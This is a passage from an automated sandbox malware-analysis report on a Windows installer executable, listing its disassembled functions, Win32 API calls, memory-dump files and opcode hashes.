                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                • String ID: "C:\Users\user\Desktop\Antndte.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 589700163-3580493748
                                                                                                                                • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                                                                                • Instruction ID: 662237d401549a0b86d5a4e6e01ff77a7750504751085e1aca306c60b5ffe750
                                                                                                                                • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                                                                                • Instruction Fuzzy Hash: 3911B655800612A5D7303B18BC40AB776B8EF68750B52403FED8A732C5E77C5CA286BD
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0040427E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040429B
                                                                                                                                • GetSysColor.USER32(00000000), ref: 004042B7
                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004042C3
                                                                                                                                • SetBkMode.GDI32(?,?), ref: 004042CF
                                                                                                                                • GetSysColor.USER32(?), ref: 004042E2
                                                                                                                                • SetBkColor.GDI32(?,?), ref: 004042F2
                                                                                                                                • DeleteObject.GDI32(?), ref: 0040430C
                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404316
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                                                                • Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
                                                                                                                                • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                                                                • Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026EB
                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 0040270E
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 00402724
                                                                                                                                  • Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405E6B
                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                • String ID: 9
                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                • Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                                                                                                • Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
                                                                                                                                • Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                                                                                                • Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00404BB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
                                                                                                                                • GetMessagePos.USER32 ref: 00404BD3
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404BED
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                • String ID: f
                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                • Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
                                                                                                                                • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                • Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DF5
                                                                                                                                • MulDiv.KERNEL32(00055363,00000064,00055567), ref: 00402E20
                                                                                                                                • wsprintfW.USER32 ref: 00402E30
                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                                                                                                Strings
                                                                                                                                • verifying installer: %d%%, xrefs: 00402E2A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                • Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                                                                                                • Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
                                                                                                                                • Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                                                                                                • Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 1000256D
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.10000981678.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001121191.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001192333.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                                • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                                                                                                • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                                • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00402950
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2667972263-0
                                                                                                                                • Opcode ID: aad64d17865b04e2c8dbcb80c558165cdbd4c1765d3987868adc6cabe38a073c
                                                                                                                                • Instruction ID: c7dec26b55dd312fec5fb3faf1598927ec34475db9096b9e5e75d52a628400f5
                                                                                                                                • Opcode Fuzzy Hash: aad64d17865b04e2c8dbcb80c558165cdbd4c1765d3987868adc6cabe38a073c
                                                                                                                                • Instruction Fuzzy Hash: E521BDB1C00128BBDF216FA5DE49D9E7E79EF08364F10423AF964762E0CB794C418B98
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsm118D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsm118D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiWidelstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsm118D.tmp$C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll
                                                                                                                                • API String ID: 3109718747-4113893760
                                                                                                                                • Opcode ID: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                                                                                                • Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
                                                                                                                                • Opcode Fuzzy Hash: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                                                                                                • Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 100022D0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                                                                                  • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.10000981678.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001121191.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001192333.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4216380887-0
                                                                                                                                • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                                                                                • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00401DB3 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetDC.USER32(?), ref: 00401DB6
                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                                                                                • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E38
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3808545654-0
                                                                                                                                • Opcode ID: 2436c958ee3071ddbde98fbfe31ca5aa93b36360e0cd4885b2b6d74d2be8512d
                                                                                                                                • Instruction ID: 8058adb7fc53f801c03006c9ef56a62efa99793a140a93f16ed6c143b7d909dc
                                                                                                                                • Opcode Fuzzy Hash: 2436c958ee3071ddbde98fbfe31ca5aa93b36360e0cd4885b2b6d74d2be8512d
                                                                                                                                • Instruction Fuzzy Hash: 9A015271944240EFE701ABB4AE8A6D97FB49F95301F10457EE241F61E2CAB800459F2D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.10000981678.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001121191.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001192333.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1148316912-0
                                                                                                                                • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
